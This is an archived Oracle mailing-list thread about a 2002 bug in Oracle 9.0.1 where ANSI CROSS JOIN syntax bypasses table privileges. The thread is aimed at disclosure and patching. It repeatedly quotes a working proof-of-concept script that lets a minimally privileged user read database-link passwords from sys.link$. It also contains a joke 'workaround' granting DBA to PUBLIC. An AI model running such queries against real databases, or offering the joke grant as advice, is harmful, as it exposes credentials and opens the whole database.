Re: Security Hole
It's even worse if British style humor is involved. Only Australians, Danes and crazy people will understand it, then. I still like the Grant Any Dictionary command, Connor. Let's try it at Oracle World in Copenhagen... Mogens [EMAIL PROTECTED] wrote: Khe, khe I would like to oppose a little bit1. healthy humor is always good2. If people are so inexperienced that they cannot understand thisparticular joke then there is no place for them in at least production dbGints PlivnaIT Sistçmas, Meríeïa 13, LV1050 Rîgahttp://www.itsystems.lv/gints/ "Dale Edgar"[EMAIL PROTECTED]To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] cc:Sent by: Subject: Re: Security Hole[EMAIL PROTECTED]2002.04.17 15:28Please respond to ORACLE-L The problem can be worked around by issuing:grant dba, select any table, select any dictionary topublic;Then the bug does not appear to be observed :-) A note of caution. One has to be a bit careful with this sort of jokearoundinexperienced people. The humor off the joke is largely based on themagnitude of the consequences and requires prior knowledge of thoseconsequences. Since these types of joke are largely said in mockseriousnessinexperienced people can miss the point and take it as real advice. Theproblem is even greater if your audience contains people for whom englishisa second language.For example, I once worked on an oil rig where the new guy was tasked withcleaning some grease off the deck. He enquired, quite innocently, as towhathe should use to help get the grease up. Someone replied "Oh just use theSodium Hydroxide, that'll get it good and clean". It was common knowledgethat Sodium Hydroxide (a strong Base) is one of the most corrosive thingsaround and to use it you get kitted out in all sorts of thick rubber gear and require special training. Its nasty nasty stuff and you would never useit for casual cleaning - which was the point of the joke. However, the newguy didn't know this and went ahead and used it - and lost most of bothhands.Just my $0.02- Dale--Check out the free DataBee DBATool - >http://www.databee.com/dt_home.htm--Please see the official ORACLE-L FAQ: http://www.orafaq.com--Author: Dale Edgar INET: [EMAIL PROTECTED]Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051San Diego, California-- Public Internet access / Mailing ListsTo REMOVE yourself from this mailing list, send an E-Mail messageto: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and inthe message BODY, include a line containing: UNSUB ORACLE-L(or the name of mailing list you want to be removed from). You mayalso send the HELP command for other information (like subscribing).
Re: Security Hole
For those of you with Metalink access, there is now a patch to this bug for 9.0.1.3 Patch number is 2121935. Platforms covered are: HP 9000 series HP-UX 64-bit Sun Sparc Solaris 64-bit IBM RS/6000 64-bit Sun Sparc Solaris Digital Alpha OpenVMS LINUX Intel Compaq Tur64 UNIX Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -Original Message- To: [EMAIL PROTECTED] [EMAIL PROTECTED] Date: 16 April 2002 11:37 |This just in from comp.databases.oracle.server. | |See metalink bug 2121935. | |Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) |allows you to view data from tables on which you have no |privilege. For example, try this COMPLETE script: | |connect / as sysdba |create user us1 identified by us1; |grant create session to us1; | |connect us1/us1 | |select userid, password |from |sys.link$ cross join dual |; | | | |Worse still, if you have the privilege to create views |then this loophole allows you to seek and destroy |ANY DATA in the database that you might want to. | |The bug is fixed in 9iR2. I didn't see any note |about a backport, or a security alert on OTN. | |Conclusion: | |9.0.1 should not be in use on production system |until Oracle supplies a fix. | | | |Jonathan Lewis |http://www.jlcomp.demon.co.uk | |Author of: |Practical Oracle 8i: Building Efficient Databases | |Next Seminar - Australia - July/August |http://www.jlcomp.demon.co.uk/seminar.html | |Host to The Co-Operative Oracle Users' FAQ |http://www.jlcomp.demon.co.uk/faq/ind_faq.html | | | | -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
RE: Security Hole
I wonder how many people have rushed out to do this on their production instances now? ;P -Original Message- McDonald Sent: 16 April 2002 23:23 To: Multiple recipients of list ORACLE-L The problem can be worked around by issuing: grant dba, select any table, select any dictionary to public; Then the bug does not appear to be observed :-) Connor --- Anjo Kolk [EMAIL PROTECTED] wrote: There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ? Anjo. Mark Leith wrote: 9i - Can't break it, can't break in! ?!?!? ;0P -Original Message- Lewis Sent: 16 April 2002 12:33 To: Multiple recipients of list ORACLE-L This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Mark Leith INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Anjo Kolk INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). = Connor McDonald http://www.oracledba.co.uk (mirrored at http://www.oradba.freeserve.co.uk) Some days you're the pigeon, some days you're the statue __ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: =?iso-8859-1?q?Connor=20McDonald?= INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Mark Leith INET: [EMAIL PROTECTED] Fat City
Re: Security Hole
Is this on 9i databases or is 8 involved? Ruth - Original Message - To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] Sent: Tuesday, April 16, 2002 7:33 AM This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Ruth Gramolini INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
RE: Security Hole
9i - Can't break it, can't break in! ?!?!? ;0P -Original Message- Lewis Sent: 16 April 2002 12:33 To: Multiple recipients of list ORACLE-L This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Mark Leith INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
RE: Security Hole
It appeared in 9i and is fixed in 9.2. 8i is not affected as it does not have cross joins. From Metalink Note 137286.1; Oracle9i introduces the following SQL:1999-compliant joins: 1.1 CROSS Join 1.2 NATURAL Join 1.3 OUTER Join 1.3.1 LEFT OUTER Join 1.3.2 RIGHT OUTER Join 1.3.3 FULL OUTER Join 1.1 CROSS Join -- A CROSS join is the cross-product of two tables. It is the equivalent of a Cartesian product. --- I tried the query with a cartesian product in 8i and it didn't work. select userid,password from sys.link$, dual * ERROR at line 1: ORA-00942: table or view does not exist -Original Message- From: Ruth Gramolini [mailto:[EMAIL PROTECTED]] Sent: Tuesday, April 16, 2002 8:38 AM To: Multiple recipients of list ORACLE-L Subject: Re: Security Hole Is this on 9i databases or is 8 involved? Ruth - Original Message - To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] Sent: Tuesday, April 16, 2002 7:33 AM This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Ruth Gramolini INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Glenn Travis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
RE: Security Hole
I forwarded it to SANS. Regards, Patrice Boivin Systems Analyst (Oracle Certified DBA) Systems Admin Operations | Admin. et Exploit. des systèmes Technology Services| Services technologiques Informatics Branch | Direction de l'informatique Maritimes Region, DFO | Région des Maritimes, MPO E-Mail: [EMAIL PROTECTED] -Original Message- Sent: Tuesday, April 16, 2002 8:33 AM To: Multiple recipients of list ORACLE-L Subject:Security Hole This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Boivin, Patrice J INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
Re: Security Hole
Thanks! RBG - Original Message - To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] Sent: Tuesday, April 16, 2002 10:13 AM Oracle 9 only. Oracle 8 does not support ANSI join syntax. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -Original Message- To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] Date: 16 April 2002 13:47 |Is this on 9i databases or is 8 involved? Ruth |- Original Message - |To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] |Sent: Tuesday, April 16, 2002 7:33 AM | | | This just in from comp.databases.oracle.server. | | See metalink bug 2121935. | | Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) | allows you to view data from tables on which you have no | privilege. For example, try this COMPLETE script: | | connect / as sysdba | create user us1 identified by us1; | grant create session to us1; | | connect us1/us1 | | select userid, password | from | sys.link$ cross join dual | ; | | | | Worse still, if you have the privilege to create views | then this loophole allows you to seek and destroy | ANY DATA in the database that you might want to. | | The bug is fixed in 9iR2. I didn't see any note | about a backport, or a security alert on OTN. | | Conclusion: | | 9.0.1 should not be in use on production system | until Oracle supplies a fix. | -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Ruth Gramolini INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
RE: Security Hole
Glenn, did the user have access to LINK$. It's common practice to restrict access to that table. Cheers, Mike -Original Message- Sent: Tuesday, April 16, 2002 3:39 PM To: Multiple recipients of list ORACLE-L It appeared in 9i and is fixed in 9.2. 8i is not affected as it does not have cross joins. From Metalink Note 137286.1; Oracle9i introduces the following SQL:1999-compliant joins: 1.1 CROSS Join 1.2 NATURAL Join 1.3 OUTER Join 1.3.1 LEFT OUTER Join 1.3.2 RIGHT OUTER Join 1.3.3 FULL OUTER Join 1.1 CROSS Join -- A CROSS join is the cross-product of two tables. It is the equivalent of a Cartesian product. --- I tried the query with a cartesian product in 8i and it didn't work. select userid,password from sys.link$, dual * ERROR at line 1: ORA-00942: table or view does not exist -Original Message- From: Ruth Gramolini [mailto:[EMAIL PROTECTED]] Sent: Tuesday, April 16, 2002 8:38 AM To: Multiple recipients of list ORACLE-L Subject: Re: Security Hole Is this on 9i databases or is 8 involved? Ruth - Original Message - To: Multiple recipients of list ORACLE-L [EMAIL PROTECTED] Sent: Tuesday, April 16, 2002 7:33 AM This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Ruth Gramolini INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Glenn Travis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). This email and any attached to it are confidential and intended only for the individual or entity to which it is addressed. If you are not the intended recipient, please let us know by telephoning or emailing the sender. You should also delete the email and any attachment from your systems and should not copy the email or any attachment or disclose their content to any other person or entity. The views expressed here are not necessarily those
RE: Security Hole
Mike, that is the beauty of this bug, you don't need access to link$ for this to work. Raj __ Rajendra Jamadagni MIS, ESPN Inc. Rajendra dot Jamadagni at ESPN dot com Any opinion expressed here is personal and doesn't reflect that of ESPN Inc. QOTD: Any clod can have facts, but having an opinion is an art! -Original Message- Sent: Tuesday, April 16, 2002 11:39 AM To: Multiple recipients of list ORACLE-L Glenn, did the user have access to LINK$. It's common practice to restrict access to that table. Cheers, Mike *2 This e-mail message is confidential, intended only for the named recipient(s) above and may contain information that is privileged, attorney work product or exempt from disclosure under applicable law. If you have received this message in error, or are not the named recipient(s), please immediately notify corporate MIS at (860) 766-2000 and delete this e-mail message from your computer, Thank you. *2
Re: Security Hole
There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ? Anjo. Mark Leith wrote: 9i - Can't break it, can't break in! ?!?!? ;0P -Original Message- Lewis Sent: 16 April 2002 12:33 To: Multiple recipients of list ORACLE-L This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Mark Leith INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Anjo Kolk INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
Re: Security Hole
The problem can be worked around by issuing: grant dba, select any table, select any dictionary to public; Then the bug does not appear to be observed :-) Connor --- Anjo Kolk [EMAIL PROTECTED] wrote: There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ? Anjo. Mark Leith wrote: 9i - Can't break it, can't break in! ?!?!? ;0P -Original Message- Lewis Sent: 16 April 2002 12:33 To: Multiple recipients of list ORACLE-L This just in from comp.databases.oracle.server. See metalink bug 2121935. Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script: connect / as sysdba create user us1 identified by us1; grant create session to us1; connect us1/us1 select userid, password from sys.link$ cross join dual ; Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to. The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN. Conclusion: 9.0.1 should not be in use on production system until Oracle supplies a fix. Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Mark Leith INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Anjo Kolk INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). = Connor McDonald http://www.oracledba.co.uk (mirrored at http://www.oradba.freeserve.co.uk) Some days you're the pigeon, some days you're the statue __ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: =?iso-8859-1?q?Connor=20McDonald?= INET: [EMAIL PROTECTED] Fat City Network Services-- (858) 538-5051 FAX: (858) 538-5051 San Diego, California-- Public Internet access / Mailing Lists To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).